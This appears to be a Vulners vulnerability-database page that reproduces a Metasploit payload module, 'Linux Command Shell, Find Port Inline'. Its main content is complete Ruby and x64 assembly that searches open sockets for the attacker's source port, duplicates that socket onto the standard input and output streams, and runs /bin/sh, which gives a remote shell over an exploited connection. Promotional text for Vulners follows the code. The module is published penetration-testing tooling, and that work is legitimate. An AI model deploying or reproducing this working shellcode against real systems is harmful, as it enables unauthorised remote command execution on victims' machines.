Lucene search
K

Linux Command Shell, Find Port Inline

🗓️ 14 Mar 2012 21:39:56Reported by makType 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

Linux Command Shell, Find Port Inline. Spawn a shell on an established connection

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = 98

  include Msf::Payload::Single
  include Msf::Payload::Linux::X64::Prepends
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Find Port Inline',
      'Description'   => 'Spawn a shell on an established connection',
      'Author'        => 'mak',
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_X64,
      'Handler'       => Msf::Handler::FindPort,
      'Session'       => Msf::Sessions::CommandShellUnix,
      'Payload'       =>
        {
          'Offsets' =>
            {
              'CPORT' => [ 39, 'n' ],
            },

          'Assembly' => %Q|
            xor rdi,rdi
            xor rbx,rbx
            mov bl,0x18
            sub rsp,rbx
            lea rdx,[rsp]
            mov [rdx], 0x10
            lea rsi,[rsp+8]
          find_port:
            push 0x34     ; getpeername
            pop rax
            syscall
            inc rdi
            cmp word [rsi+2],0x4142
            jne find_port
            dec rdi
            push 2
            pop rsi
          dup2:
            push 0x21     ; dup2
            pop rax
            syscall
            dec rsi
            jns dup2
            mov rbx,rsi
            mov ebx, 0x68732f41
            mov eax,0x6e69622f
            shr rbx,8
            shl rbx,32
            or  rax,rbx
            push rax
            mov rdi,rsp
            xor rsi,rsi
            mov rdx,rsi
            push 0x3b     ; execve
            pop rax
            syscall
          |
        }
      ))
  end

  def size
    return 91
  end


end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jan 2025 14:31Current
7.4High risk
Vulners AI Score7.4
16